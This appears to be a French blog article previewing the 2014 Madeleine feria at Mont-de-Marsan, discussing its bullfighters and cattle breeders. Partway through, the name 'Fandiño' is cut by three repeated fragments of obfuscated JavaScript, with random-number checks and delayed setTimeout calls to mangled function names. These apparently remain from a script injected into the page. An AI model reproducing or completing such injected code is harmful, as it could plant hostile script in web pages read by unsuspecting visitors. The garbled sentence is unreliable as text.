MONT DE MARSAN 2014 : LES ENJEUX DE LA FERIA

Chaque arène a sa personnalité, ses toreros, ses élevages de prédilection et la programmation doit répondre aux attentes du public. La feria de la Madeleine se situe à l’équateur de la temporada française et n’entre pas en concurrence avec d’autres ferias, que ce soit en France ou en Espagne. C’est pourquoi elle est, depuis longtemps, l’épicentre de la planète taurine vers la mi-juillet.

Marie Sara et son équipe ont parié sur une formule qui a fonctionné ces dernières années en cherchant l’équilibre entre une programmation toriste et toreriste.

Elle débutera en fanfare avec la présence de Morante et de Manzanares mais certains aficionados s’interrogent sur Zalduendo. En effet si cet élevage a été le protagoniste d’après-midi somptueux, on se souvient d’autres où la présentation laissait à désirer et il ne faudrait surtout pas que leur trapio s’apparente à celui d’un novillo car l’intégrité du spectacle serait compromise.

Le fer de La Quinta, jadis adulé, n’était plus en odeur de sainteté ces dernières années dans le sud ouest. On lui reprochait d’avoir fait trop de concessions par rapport aux figuras au point de sortir des toros décaféinés. C’est un pari osé les faire revenir en plus avec un matador comme El Juli, jugé par certains comme un des responsables de ce déclin. Le madrilène, dont c’est la seule comparution lors de cette feria où il se produit habituellement deux fois, joue donc gros, tout comme l’éleveur Matinez Conradi.

La empresa a surtout parié sur Iván Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andiño, qui sera le seul torero à faire deux fois le paseo, comme l’année dernière où il avait triomphé à chaque occasion. Si ça se reproduisait, ce qui est bien possible, le cartel du torero basque exploserait pour de bon.

Comme nous le disions la empresa a choisi aussi de mettre le paquet sur des élevages toristes ou avec des noms porteurs comme ceux de Fuente Ymbro et de Joselito. Ces deux derniers, qui ont connu des moments d’apothéose, ont eu dernièrement des résultats irréguliers ces derniers temps et seront mis en concurrence sur une même affiche.

Pour finir en beauté sont programmés Victorino et Miura qui en principe devraient procurer un spectacle épique avec un public différent de celui des autres jours. Reste à savoir la réponse à la taquilla et a priori ça se présente plutôt très bien.

Les commentaires sont fermés.